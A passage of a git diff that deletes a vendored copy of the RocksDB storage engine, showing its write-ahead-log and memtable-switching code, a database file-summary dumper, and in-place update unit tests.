-    // and the batch is not wanting to be truncated
-    merged_batch = leader->batch;
-    *write_with_wal = 1;
-  } else {
-    // WAL needs all of the batches flattened into a single batch.
-    // We could avoid copying here with an iov-like AddRecord
-    // interface
-    merged_batch = tmp_batch;
-    for (auto writer : write_group) {
-      if (writer->ShouldWriteToWAL()) {
-        WriteBatchInternal::Append(merged_batch, writer->batch,
-                                   /*WAL_only*/ true);
-        (*write_with_wal)++;
-      }
-    }
-  }
-  return merged_batch;
-}
-
-// When concurrent_prepare_ is disabled, this function is called from the only
-// write thread. Otherwise this must be called holding log_write_mutex_.
-Status DBImpl::WriteToWAL(const WriteBatch& merged_batch,
-                          log::Writer* log_writer, uint64_t* log_used,
-                          uint64_t* log_size) {
-  assert(log_size != nullptr);
-  Slice log_entry = WriteBatchInternal::Contents(&merged_batch);
-  *log_size = log_entry.size();
-  Status status = log_writer->AddRecord(log_entry);
-  if (log_used != nullptr) {
-    *log_used = logfile_number_;
-  }
-  total_log_size_ += log_entry.size();
-  // TODO(myabandeh): it might be unsafe to access alive_log_files_.back() here
-  // since alive_log_files_ might be modified concurrently
-  alive_log_files_.back().AddSize(log_entry.size());
-  log_empty_ = false;
-  return status;
-}
-
-Status DBImpl::WriteToWAL(const WriteThread::WriteGroup& write_group,
-                          log::Writer* log_writer, uint64_t* log_used,
-                          bool need_log_sync, bool need_log_dir_sync,
-                          SequenceNumber sequence) {
-  Status status;
-
-  size_t write_with_wal = 0;
-  WriteBatch* merged_batch =
-      MergeBatch(write_group, &tmp_batch_, &write_with_wal);
-  if (merged_batch == write_group.leader->batch) {
-    write_group.leader->log_used = logfile_number_;
-  } else if (write_with_wal > 1) {
-    for (auto writer : write_group) {
-      writer->log_used = logfile_number_;
-    }
-  }
-
-  WriteBatchInternal::SetSequence(merged_batch, sequence);
-
-  uint64_t log_size;
-  status = WriteToWAL(*merged_batch, log_writer, log_used, &log_size);
-
-  if (status.ok() && need_log_sync) {
-    StopWatch sw(env_, stats_, WAL_FILE_SYNC_MICROS);
-    // It's safe to access logs_ with unlocked mutex_ here because:
-    //  - we've set getting_synced=true for all logs,
-    //    so other threads won't pop from logs_ while we're here,
-    //  - only writer thread can push to logs_, and we're in
-    //    writer thread, so no one will push to logs_,
-    //  - as long as other threads don't modify it, it's safe to read
-    //    from std::deque from multiple threads concurrently.
-    for (auto& log : logs_) {
-      status = log.writer->file()->Sync(immutable_db_options_.use_fsync);
-      if (!status.ok()) {
-        break;
-      }
-    }
-    if (status.ok() && need_log_dir_sync) {
-      // We only sync WAL directory the first time WAL syncing is
-      // requested, so that in case users never turn on WAL sync,
-      // we can avoid the disk I/O in the write code path.
-      status = directories_.GetWalDir()->Fsync();
-    }
-  }
-
-  if (merged_batch == &tmp_batch_) {
-    tmp_batch_.Clear();
-  }
-  if (status.ok()) {
-    auto stats = default_cf_internal_stats_;
-    if (need_log_sync) {
-      stats->AddDBStats(InternalStats::WAL_FILE_SYNCED, 1);
-      RecordTick(stats_, WAL_FILE_SYNCED);
-    }
-    stats->AddDBStats(InternalStats::WAL_FILE_BYTES, log_size);
-    RecordTick(stats_, WAL_FILE_BYTES, log_size);
-    stats->AddDBStats(InternalStats::WRITE_WITH_WAL, write_with_wal);
-    RecordTick(stats_, WRITE_WITH_WAL, write_with_wal);
-  }
-  return status;
-}
-
-Status DBImpl::ConcurrentWriteToWAL(const WriteThread::WriteGroup& write_group,
-                                    uint64_t* log_used,
-                                    SequenceNumber* last_sequence,
-                                    int total_count) {
-  Status status;
-
-  WriteBatch tmp_batch;
-  size_t write_with_wal = 0;
-  WriteBatch* merged_batch =
-      MergeBatch(write_group, &tmp_batch, &write_with_wal);
-
-  // We need to lock log_write_mutex_ since logs_ and alive_log_files might be
-  // pushed back concurrently
-  log_write_mutex_.Lock();
-  if (merged_batch == write_group.leader->batch) {
-    write_group.leader->log_used = logfile_number_;
-  } else if (write_with_wal > 1) {
-    for (auto writer : write_group) {
-      writer->log_used = logfile_number_;
-    }
-  }
-  *last_sequence = versions_->FetchAddLastToBeWrittenSequence(total_count);
-  auto sequence = *last_sequence + 1;
-  WriteBatchInternal::SetSequence(merged_batch, sequence);
-
-  log::Writer* log_writer = logs_.back().writer;
-  uint64_t log_size;
-  status = WriteToWAL(*merged_batch, log_writer, log_used, &log_size);
-  log_write_mutex_.Unlock();
-
-  if (status.ok()) {
-    const bool concurrent = true;
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::WAL_FILE_BYTES, log_size, concurrent);
-    RecordTick(stats_, WAL_FILE_BYTES, log_size);
-    stats->AddDBStats(InternalStats::WRITE_WITH_WAL, write_with_wal,
-                      concurrent);
-    RecordTick(stats_, WRITE_WITH_WAL, write_with_wal);
-  }
-  return status;
-}
-
-Status DBImpl::HandleWALFull(WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr);
-  Status status;
-
-  if (alive_log_files_.begin()->getting_flushed) {
-    return status;
-  }
-
-  auto oldest_alive_log = alive_log_files_.begin()->number;
-  auto oldest_log_with_uncommited_prep = FindMinLogContainingOutstandingPrep();
-
-  if (allow_2pc() &&
-      oldest_log_with_uncommited_prep > 0 &&
-      oldest_log_with_uncommited_prep <= oldest_alive_log) {
-    if (unable_to_flush_oldest_log_) {
-        // we already attempted to flush all column families dependent on
-        // the oldest alive log but the log still contained uncommited transactions.
-        // the oldest alive log STILL contains uncommited transaction so there
-        // is still nothing that we can do.
-        return status;
-    } else {
-      ROCKS_LOG_WARN(
-          immutable_db_options_.info_log,
-          "Unable to release oldest log due to uncommited transaction");
-      unable_to_flush_oldest_log_ = true;
-    }
-  } else {
-    // we only mark this log as getting flushed if we have successfully
-    // flushed all data in this log. If this log contains outstanding prepared
-    // transactions then we cannot flush this log until those transactions are commited.
-    unable_to_flush_oldest_log_ = false;
-    alive_log_files_.begin()->getting_flushed = true;
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Flushing all column families with data in WAL number %" PRIu64
-                 ". Total log size is %" PRIu64
-                 " while max_total_wal_size is %" PRIu64,
-                 oldest_alive_log, total_log_size_.load(), GetMaxTotalWalSize());
-  // no need to refcount because drop is happening in write thread, so can't
-  // happen while we're in the write thread
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    if (cfd->OldestLogToKeep() <= oldest_alive_log) {
-      status = SwitchMemtable(cfd, write_context);
-      if (!status.ok()) {
-        break;
-      }
-      cfd->imm()->FlushRequested();
-      SchedulePendingFlush(cfd);
-    }
-  }
-  MaybeScheduleFlushOrCompaction();
-  return status;
-}
-
-Status DBImpl::HandleWriteBufferFull(WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr);
-  Status status;
-
-  // Before a new memtable is added in SwitchMemtable(),
-  // write_buffer_manager_->ShouldFlush() will keep returning true. If another
-  // thread is writing to another DB with the same write buffer, they may also
-  // be flushed. We may end up with flushing much more DBs than needed. It's
-  // suboptimal but still correct.
-  ROCKS_LOG_INFO(
-      immutable_db_options_.info_log,
-      "Flushing column family with largest mem table size. Write buffer is "
-      "using %" PRIu64 " bytes out of a total of %" PRIu64 ".",
-      write_buffer_manager_->memory_usage(),
-      write_buffer_manager_->buffer_size());
-  // no need to refcount because drop is happening in write thread, so can't
-  // happen while we're in the write thread
-  ColumnFamilyData* cfd_picked = nullptr;
-  SequenceNumber seq_num_for_cf_picked = kMaxSequenceNumber;
-
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    if (!cfd->mem()->IsEmpty()) {
-      // We only consider active mem table, hoping immutable memtable is
-      // already in the process of flushing.
-      uint64_t seq = cfd->mem()->GetCreationSeq();
-      if (cfd_picked == nullptr || seq < seq_num_for_cf_picked) {
-        cfd_picked = cfd;
-        seq_num_for_cf_picked = seq;
-      }
-    }
-  }
-  if (cfd_picked != nullptr) {
-    status = SwitchMemtable(cfd_picked, write_context);
-    if (status.ok()) {
-      cfd_picked->imm()->FlushRequested();
-      SchedulePendingFlush(cfd_picked);
-      MaybeScheduleFlushOrCompaction();
-    }
-  }
-  return status;
-}
-
-uint64_t DBImpl::GetMaxTotalWalSize() const {
-  mutex_.AssertHeld();
-  return mutable_db_options_.max_total_wal_size == 0
-             ? 4 * max_total_in_memory_state_
-             : mutable_db_options_.max_total_wal_size;
-}
-
-// REQUIRES: mutex_ is held
-// REQUIRES: this thread is currently at the front of the writer queue
-Status DBImpl::DelayWrite(uint64_t num_bytes,
-                          const WriteOptions& write_options) {
-  uint64_t time_delayed = 0;
-  bool delayed = false;
-  {
-    StopWatch sw(env_, stats_, WRITE_STALL, &time_delayed);
-    uint64_t delay = write_controller_.GetDelay(env_, num_bytes);
-    if (delay > 0) {
-      if (write_options.no_slowdown) {
-        return Status::Incomplete();
-      }
-      TEST_SYNC_POINT("DBImpl::DelayWrite:Sleep");
-
-      mutex_.Unlock();
-      // We will delay the write until we have slept for delay ms or
-      // we don't need a delay anymore
-      const uint64_t kDelayInterval = 1000;
-      uint64_t stall_end = sw.start_time() + delay;
-      while (write_controller_.NeedsDelay()) {
-        if (env_->NowMicros() >= stall_end) {
-          // We already delayed this write `delay` microseconds
-          break;
-        }
-
-        delayed = true;
-        // Sleep for 0.001 seconds
-        env_->SleepForMicroseconds(kDelayInterval);
-      }
-      mutex_.Lock();
-    }
-
-    while (bg_error_.ok() && write_controller_.IsStopped()) {
-      if (write_options.no_slowdown) {
-        return Status::Incomplete();
-      }
-      delayed = true;
-      TEST_SYNC_POINT("DBImpl::DelayWrite:Wait");
-      bg_cv_.Wait();
-    }
-  }
-  assert(!delayed || !write_options.no_slowdown);
-  if (delayed) {
-    default_cf_internal_stats_->AddDBStats(InternalStats::WRITE_STALL_MICROS,
-                                           time_delayed);
-    RecordTick(stats_, STALL_MICROS, time_delayed);
-  }
-
-  return bg_error_;
-}
-
-Status DBImpl::ThrottleLowPriWritesIfNeeded(const WriteOptions& write_options,
-                                            WriteBatch* my_batch) {
-  assert(write_options.low_pri);
-  // This is called outside the DB mutex. Although it is safe to make the call,
-  // the consistency condition is not guaranteed to hold. It's OK to live with
-  // it in this case.
-  // If we need to speed compaction, it means the compaction is left behind
-  // and we start to limit low pri writes to a limit.
-  if (write_controller_.NeedSpeedupCompaction()) {
-    if (allow_2pc() && (my_batch->HasCommit() || my_batch->HasRollback())) {
-      // For 2PC, we only rate limit prepare, not commit.
-      return Status::OK();
-    }
-    if (write_options.no_slowdown) {
-      return Status::Incomplete();
-    } else {
-      assert(my_batch != nullptr);
-      // Rate limit those writes. The reason that we don't completely wait
-      // is that in case the write is heavy, low pri writes may never have
-      // a chance to run. Now we guarantee we are still slowly making
-      // progress.
-      write_controller_.low_pri_rate_limiter()->Request(
-          my_batch->GetDataSize(), Env::IO_HIGH, nullptr /* stats */,
-          RateLimiter::OpType::kWrite);
-    }
-  }
-  return Status::OK();
-}
-
-Status DBImpl::ScheduleFlushes(WriteContext* context) {
-  ColumnFamilyData* cfd;
-  while ((cfd = flush_scheduler_.TakeNextColumnFamily()) != nullptr) {
-    auto status = SwitchMemtable(cfd, context);
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-    if (!status.ok()) {
-      return status;
-    }
-  }
-  return Status::OK();
-}
-
-#ifndef ROCKSDB_LITE
-void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd,
-                                    const MemTableInfo& mem_table_info) {
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-
-  for (auto listener : immutable_db_options_.listeners) {
-    listener->OnMemTableSealed(mem_table_info);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-// REQUIRES: mutex_ is held
-// REQUIRES: this thread is currently at the front of the writer queue
-Status DBImpl::SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context) {
-  mutex_.AssertHeld();
-  WriteThread::Writer nonmem_w;
-  if (concurrent_prepare_) {
-    // SwitchMemtable is a rare event. To simply the reasoning, we make sure
-    // that there is no concurrent thread writing to WAL.
-    nonmem_write_thread_.EnterUnbatched(&nonmem_w, &mutex_);
-  }
-
-  unique_ptr<WritableFile> lfile;
-  log::Writer* new_log = nullptr;
-  MemTable* new_mem = nullptr;
-
-  // In case of pipelined write is enabled, wait for all pending memtable
-  // writers.
-  if (immutable_db_options_.enable_pipelined_write) {
-    write_thread_.WaitForMemTableWriters();
-  }
-
-  // Attempt to switch to a new memtable and trigger flush of old.
-  // Do this without holding the dbmutex lock.
-  assert(versions_->prev_log_number() == 0);
-  if (concurrent_prepare_) {
-    log_write_mutex_.Lock();
-  }
-  bool creating_new_log = !log_empty_;
-  if (concurrent_prepare_) {
-    log_write_mutex_.Unlock();
-  }
-  uint64_t recycle_log_number = 0;
-  if (creating_new_log && immutable_db_options_.recycle_log_file_num &&
-      !log_recycle_files.empty()) {
-    recycle_log_number = log_recycle_files.front();
-    log_recycle_files.pop_front();
-  }
-  uint64_t new_log_number =
-      creating_new_log ? versions_->NewFileNumber() : logfile_number_;
-  SuperVersion* new_superversion = nullptr;
-  const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions();
-
-  // Set memtable_info for memtable sealed callback
-#ifndef ROCKSDB_LITE
-  MemTableInfo memtable_info;
-  memtable_info.cf_name = cfd->GetName();
-  memtable_info.first_seqno = cfd->mem()->GetFirstSequenceNumber();
-  memtable_info.earliest_seqno = cfd->mem()->GetEarliestSequenceNumber();
-  memtable_info.num_entries = cfd->mem()->num_entries();
-  memtable_info.num_deletes = cfd->mem()->num_deletes();
-#endif  // ROCKSDB_LITE
-  // Log this later after lock release. It may be outdated, e.g., if background
-  // flush happens before logging, but that should be ok.
-  int num_imm_unflushed = cfd->imm()->NumNotFlushed();
-  DBOptions db_options =
-      BuildDBOptions(immutable_db_options_, mutable_db_options_);
-  const auto preallocate_block_size =
-    GetWalPreallocateBlockSize(mutable_cf_options.write_buffer_size);
-  mutex_.Unlock();
-  Status s;
-  {
-    if (creating_new_log) {
-      EnvOptions opt_env_opt =
-          env_->OptimizeForLogWrite(env_options_, db_options);
-      if (recycle_log_number) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "reusing log %" PRIu64 " from recycle list\n",
-                       recycle_log_number);
-        s = env_->ReuseWritableFile(
-            LogFileName(immutable_db_options_.wal_dir, new_log_number),
-            LogFileName(immutable_db_options_.wal_dir, recycle_log_number),
-            &lfile, opt_env_opt);
-      } else {
-        s = NewWritableFile(
-            env_, LogFileName(immutable_db_options_.wal_dir, new_log_number),
-            &lfile, opt_env_opt);
-      }
-      if (s.ok()) {
-        // Our final size should be less than write_buffer_size
-        // (compression, etc) but err on the side of caution.
-
-        // use preallocate_block_size instead
-        // of calling GetWalPreallocateBlockSize()
-        lfile->SetPreallocationBlockSize(preallocate_block_size);
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(lfile), opt_env_opt));
-        new_log = new log::Writer(
-            std::move(file_writer), new_log_number,
-            immutable_db_options_.recycle_log_file_num > 0, manual_wal_flush_);
-      }
-    }
-
-    if (s.ok()) {
-      SequenceNumber seq = versions_->LastSequence();
-      new_mem = cfd->ConstructNewMemtable(mutable_cf_options, seq);
-      new_superversion = new SuperVersion();
-    }
-
-#ifndef ROCKSDB_LITE
-    // PLEASE NOTE: We assume that there are no failable operations
-    // after lock is acquired below since we are already notifying
-    // client about mem table becoming immutable.
-    NotifyOnMemTableSealed(cfd, memtable_info);
-#endif //ROCKSDB_LITE
-  }
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "[%s] New memtable created with log file: #%" PRIu64
-                 ". Immutable memtables: %d.\n",
-                 cfd->GetName().c_str(), new_log_number, num_imm_unflushed);
-  mutex_.Lock();
-  if (!s.ok()) {
-    // how do we fail if we're not creating new log?
-    assert(creating_new_log);
-    assert(!new_mem);
-    assert(!new_log);
-    if (concurrent_prepare_) {
-      nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-    }
-    return s;
-  }
-  if (creating_new_log) {
-    log_write_mutex_.Lock();
-    logfile_number_ = new_log_number;
-    assert(new_log != nullptr);
-    log_empty_ = true;
-    log_dir_synced_ = false;
-    if (!logs_.empty()) {
-      // Alway flush the buffer of the last log before switching to a new one
-      log::Writer* cur_log_writer = logs_.back().writer;
-      cur_log_writer->WriteBuffer();
-    }
-    logs_.emplace_back(logfile_number_, new_log);
-    alive_log_files_.push_back(LogFileNumberSize(logfile_number_));
-    log_write_mutex_.Unlock();
-  }
-  for (auto loop_cfd : *versions_->GetColumnFamilySet()) {
-    // all this is just optimization to delete logs that
-    // are no longer needed -- if CF is empty, that means it
-    // doesn't need that particular log to stay alive, so we just
-    // advance the log number. no need to persist this in the manifest
-    if (loop_cfd->mem()->GetFirstSequenceNumber() == 0 &&
-        loop_cfd->imm()->NumNotFlushed() == 0) {
-      if (creating_new_log) {
-        loop_cfd->SetLogNumber(logfile_number_);
-      }
-      loop_cfd->mem()->SetCreationSeq(versions_->LastSequence());
-    }
-  }
-
-  cfd->mem()->SetNextLogNumber(logfile_number_);
-  cfd->imm()->Add(cfd->mem(), &context->memtables_to_free_);
-  new_mem->Ref();
-  cfd->SetMemtable(new_mem);
-  context->superversions_to_free_.push_back(InstallSuperVersionAndScheduleWork(
-      cfd, new_superversion, mutable_cf_options));
-  if (concurrent_prepare_) {
-    nonmem_write_thread_.ExitUnbatched(&nonmem_w);
-  }
-  return s;
-}
-
-size_t DBImpl::GetWalPreallocateBlockSize(uint64_t write_buffer_size) const {
-  mutex_.AssertHeld();
-  size_t bsize = write_buffer_size / 10 + write_buffer_size;
-  // Some users might set very high write_buffer_size and rely on
-  // max_total_wal_size or other parameters to control the WAL size.
-  if (mutable_db_options_.max_total_wal_size > 0) {
-    bsize = std::min<size_t>(bsize, mutable_db_options_.max_total_wal_size);
-  }
-  if (immutable_db_options_.db_write_buffer_size > 0) {
-    bsize = std::min<size_t>(bsize, immutable_db_options_.db_write_buffer_size);
-  }
-  if (immutable_db_options_.write_buffer_manager &&
-      immutable_db_options_.write_buffer_manager->enabled()) {
-    bsize = std::min<size_t>(
-        bsize, immutable_db_options_.write_buffer_manager->buffer_size());
-  }
-
-  return bsize;
-}
-
-// Default implementations of convenience methods that subclasses of DB
-// can call if they wish
-Status DB::Put(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-               const Slice& key, const Slice& value) {
-  // Pre-allocate size of write batch conservatively.
-  // 8 bytes are taken by header, 4 bytes for count, 1 byte for type,
-  // and we allocate 11 extra bytes for key length, as well as value length.
-  WriteBatch batch(key.size() + value.size() + 24);
-  batch.Put(column_family, key, value);
-  return Write(opt, &batch);
-}
-
-Status DB::Delete(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-                  const Slice& key) {
-  WriteBatch batch;
-  batch.Delete(column_family, key);
-  return Write(opt, &batch);
-}
-
-Status DB::SingleDelete(const WriteOptions& opt,
-                        ColumnFamilyHandle* column_family, const Slice& key) {
-  WriteBatch batch;
-  batch.SingleDelete(column_family, key);
-  return Write(opt, &batch);
-}
-
-Status DB::DeleteRange(const WriteOptions& opt,
-                       ColumnFamilyHandle* column_family,
-                       const Slice& begin_key, const Slice& end_key) {
-  WriteBatch batch;
-  batch.DeleteRange(column_family, begin_key, end_key);
-  return Write(opt, &batch);
-}
-
-Status DB::Merge(const WriteOptions& opt, ColumnFamilyHandle* column_family,
-                 const Slice& key, const Slice& value) {
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(opt, &batch);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_info_dumper.cc b/thirdparty/rocksdb/db/db_info_dumper.cc
deleted file mode 100644
index 1668a16..0000000
--- a/thirdparty/rocksdb/db/db_info_dumper.cc
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "db/db_info_dumper.h"
-
-#include <inttypes.h>
-#include <stdio.h>
-#include <string>
-#include <algorithm>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-void DumpDBFileSummary(const ImmutableDBOptions& options,
-                       const std::string& dbname) {
-  if (options.info_log == nullptr) {
-    return;
-  }
-
-  auto* env = options.env;
-  uint64_t number = 0;
-  FileType type = kInfoLogFile;
-
-  std::vector<std::string> files;
-  uint64_t file_num = 0;
-  uint64_t file_size;
-  std::string file_info, wal_info;
-
-  Header(options.info_log, "DB SUMMARY\n");
-  // Get files in dbname dir
-  if (!env->GetChildren(dbname, &files).ok()) {
-    Error(options.info_log,
-          "Error when reading %s dir\n", dbname.c_str());
-  }
-  std::sort(files.begin(), files.end());
-  for (std::string file : files) {
-    if (!ParseFileName(file, &number, &type)) {
-      continue;
-    }
-    switch (type) {
-      case kCurrentFile:
-        Header(options.info_log, "CURRENT file:  %s\n", file.c_str());
-        break;
-      case kIdentityFile:
-        Header(options.info_log, "IDENTITY file:  %s\n", file.c_str());
-        break;
-      case kDescriptorFile:
-        env->GetFileSize(dbname + "/" + file, &file_size);
-        Header(options.info_log, "MANIFEST file:  %s size: %" PRIu64 " Bytes\n",
-               file.c_str(), file_size);
-        break;
-      case kLogFile:
-        env->GetFileSize(dbname + "/" + file, &file_size);
-        char str[16];
-        snprintf(str, sizeof(str), "%" PRIu64, file_size);
-        wal_info.append(file).append(" size: ").
-            append(str).append(" ; ");
-        break;
-      case kTableFile:
-        if (++file_num < 10) {
-          file_info.append(file).append(" ");
-        }
-        break;
-      default:
-        break;
-    }
-  }
-
-  // Get sst files in db_path dir
-  for (auto& db_path : options.db_paths) {
-    if (dbname.compare(db_path.path) != 0) {
-      if (!env->GetChildren(db_path.path, &files).ok()) {
-        Error(options.info_log,
-            "Error when reading %s dir\n",
-            db_path.path.c_str());
-        continue;
-      }
-      std::sort(files.begin(), files.end());
-      for (std::string file : files) {
-        if (ParseFileName(file, &number, &type)) {
-          if (type == kTableFile && ++file_num < 10) {
-            file_info.append(file).append(" ");
-          }
-        }
-      }
-    }
-    Header(options.info_log,
-           "SST files in %s dir, Total Num: %" PRIu64 ", files: %s\n",
-           db_path.path.c_str(), file_num, file_info.c_str());
-    file_num = 0;
-    file_info.clear();
-  }
-
-  // Get wal file in wal_dir
-  if (dbname.compare(options.wal_dir) != 0) {
-    if (!env->GetChildren(options.wal_dir, &files).ok()) {
-      Error(options.info_log,
-          "Error when reading %s dir\n",
-          options.wal_dir.c_str());
-      return;
-    }
-    wal_info.clear();
-    for (std::string file : files) {
-      if (ParseFileName(file, &number, &type)) {
-        if (type == kLogFile) {
-          env->GetFileSize(options.wal_dir + "/" + file, &file_size);
-          char str[16];
-          snprintf(str, sizeof(str), "%" PRIu64, file_size);
-          wal_info.append(file).append(" size: ").
-              append(str).append(" ; ");
-        }
-      }
-    }
-  }
-  Header(options.info_log, "Write Ahead Log file in %s: %s\n",
-         options.wal_dir.c_str(), wal_info.c_str());
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_info_dumper.h b/thirdparty/rocksdb/db/db_info_dumper.h
deleted file mode 100644
index acff8f1..0000000
--- a/thirdparty/rocksdb/db/db_info_dumper.h
+++ /dev/null
@@ -1,14 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "options/db_options.h"
-
-namespace rocksdb {
-void DumpDBFileSummary(const ImmutableDBOptions& options,
-                       const std::string& dbname);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_inplace_update_test.cc b/thirdparty/rocksdb/db/db_inplace_update_test.cc
deleted file mode 100644
index c1f1b51..0000000
--- a/thirdparty/rocksdb/db/db_inplace_update_test.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestInPlaceUpdate : public DBTestBase {
- public:
-  DBTestInPlaceUpdate() : DBTestBase("/db_inplace_update_test") {}
-};
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdate) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller size
-    int numValues = 10;
-    for (int i = numValues; i > 0; i--) {
-      std::string value = DummyString(i, 'a');
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_EQ(value, Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateLargeNewValue) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of larger size
-    int numValues = 10;
-    for (int i = 0; i < numValues; i++) {
-      std::string value = DummyString(i, 'a');
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_EQ(value, Get(1, "key"));
-    }
-
-    // All 10 updates exist in the internal iterator
-    validateNumberOfEntries(numValues, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackSmallerSize) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceSmallerSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller size
-    int numValues = 10;
-    ASSERT_OK(Put(1, "key", DummyString(numValues, 'a')));
-    ASSERT_EQ(DummyString(numValues, 'c'), Get(1, "key"));
-
-    for (int i = numValues; i > 0; i--) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(i - 1, 'b'), Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackSmallerVarintSize) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceSmallerVarintSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of smaller varint size
-    int numValues = 265;
-    ASSERT_OK(Put(1, "key", DummyString(numValues, 'a')));
-    ASSERT_EQ(DummyString(numValues, 'c'), Get(1, "key"));
-
-    for (int i = numValues; i > 0; i--) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(1, 'b'), Get(1, "key"));
-    }
-
-    // Only 1 instance for that key.
-    validateNumberOfEntries(1, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackLargeNewValue) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-      rocksdb::DBTestInPlaceUpdate::updateInPlaceLargerSize;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Update key with values of larger size
-    int numValues = 10;
-    for (int i = 0; i < numValues; i++) {
-      ASSERT_OK(Put(1, "key", DummyString(i, 'a')));
-      ASSERT_EQ(DummyString(i, 'c'), Get(1, "key"));
-    }
-
-    // No inplace updates. All updates are puts with new seq number
-    // All 10 updates exist in the internal iterator
-    validateNumberOfEntries(numValues, 1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestInPlaceUpdate, InPlaceUpdateCallbackNoAction) {
-  do {
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    options.inplace_update_support = true;
-
-    options.env = env_;
-    options.write_buffer_size = 100000;
-    options.inplace_callback =
-        rocksdb::DBTestInPlaceUpdate::updateInPlaceNoAction;
-    options.allow_concurrent_memtable_write = false;
-    Reopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Callback function requests no actions from db
-    ASSERT_OK(Put(1, "key", DummyString(1, 'a')));
-    ASSERT_EQ(Get(1, "key"), "NOT_FOUND");
-  } while (ChangeCompactOptions());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
